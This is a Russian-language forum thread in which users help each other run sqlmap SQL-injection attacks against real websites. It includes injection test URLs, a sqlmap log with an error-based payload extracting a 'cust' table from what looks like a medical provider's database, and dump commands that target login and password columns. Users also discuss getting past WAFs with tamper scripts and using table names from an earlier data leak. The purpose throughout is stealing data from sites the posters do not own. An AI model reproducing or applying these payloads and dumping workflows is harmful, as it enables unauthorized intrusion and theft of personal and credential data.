в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу ) http://site.ru/search?search_id=activetopics,version() http://site.ru/search?search_id=activetopics+where+1=1+--+s http://site.ru/search?search_id=activetopics+where+1=2+--+s
Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"
софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу я это к тому что не надо верить софту на слово
web application technology: Apache back-end DBMS: MySQL >= 4.1 [22:03:31] [INFO] fetching columns for table 'cust' in database 'medical-special ists-n' [22:03:31] [INFO] the SQL query used returns 36 entries [22:03:31] [DEBUG] suppressing possible resume console info because of large num ber of rows. It might take too long [22:03:31] [INFO] starting 10 threads [22:03:31] [DEBUG] performed 0 queries in 0.23 seconds [22:03:31] [INFO] fetching entries for table 'cust' in database 'medical-special ists-n' [22:03:31] [PAYLOAD] ' OR ROW(9489,9175)>(SELECT COUNT(*),CONCAT(0x716b706271,(S ELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM `medical-specialists-n`.cust),0x7 176786b71,FLOOR(RAND(0)*2))x FROM (SELECT 2961 UNION SELECT 8568 UNION SELECT 54 10 UNION SELECT 8661)a GROUP BY x)-- NCpp [22:03:31] [WARNING] the SQL query provided does not return any output [22:03:31] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [22:03:31] [WARNING] unable to retrieve the entries for table 'cust' in database Не могу сдампить пользователей,таблицы показывает,колонки тоже.А вот не дампит(((
делитнуть ведь от слова delete? если да, то start/stop тут не причет, это лимиты для запроса для удаления записей базы у mysql юзера должны быть соответствующие права, + если select и delete в одном запросе всё равно делать нельзя, это если скуль в select
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?
доступ к information_schema видимо нет, вот он и брутит если ты знаешь названия таблиц/столбцов, то нах вообще брутить? python sqlmap.py .... -D database -T table -C id,login,pass --dump
Всем привет, ребят столкнулся с проблемой, нужна помощь, в общем не дампит базы данных мой SqlMap, помогите в решении проблемы, мой скайп: diman_13_133 Spoiler: Скриншот
Так не один сайт не дампиться, один раз мне каким то чудом удалось сдампить оттуда базы, и все, опять не дампиться
Нет не настораживает, мне нужно решить мою проблему, вопрос почему не дампится не один сайт, и как это исправить
Так мне дельного совета никто и не дал, BabaDook не флуди пожалуйста, ребят кто помочь может в моей проблеме отпишите в ЛС или скайп
потому что вот такая вот ботва теперь если использовать известные имена таблиц и столбцов http://prntscr.com/d1w125
народ, всем привет, вопрос такого плана, мап раскрутил уязвиомость, но при попытке запроса бд, сваливается в таймаут или запрос проксей http://prntscr.com/d5eb4i пытался и прокси использовать и тамаут ставил больше стандартного, не особо помогло. Есть еще варианты??
Допустим уязвимость была раскручена как: python sqlmap.py -r request.txt (в request.txt уязвимые места были помечены *) Как теперь заставить sqlmap при каждом запуске на домен, который был указан в request.txt работать через уже найденную скулю? Т.е чтобы можно было указать python sqlmap.py -u domain.com --scheme. Можно конечно продолжить запускать его с тем же request.txt, но если файл потерялся?
пошарся в корне акка, вот тут Code: $ ls ~/.sqlmap/output/[цензура]/ dump files log session.sqlite target.txt ~/.sqlmap/output/[цензура]/log тут по идее параметры запроса есть
в вапе для обхода waf есть команда tamper ну и соответствующий набор скриптов под это дело, но при попытке раскрути мапом базы я не замечал что конкретно фильтруется или на что стоит обратить внимание при использовании скриптов. Или данные вещи чисто на удачу, методом перебора?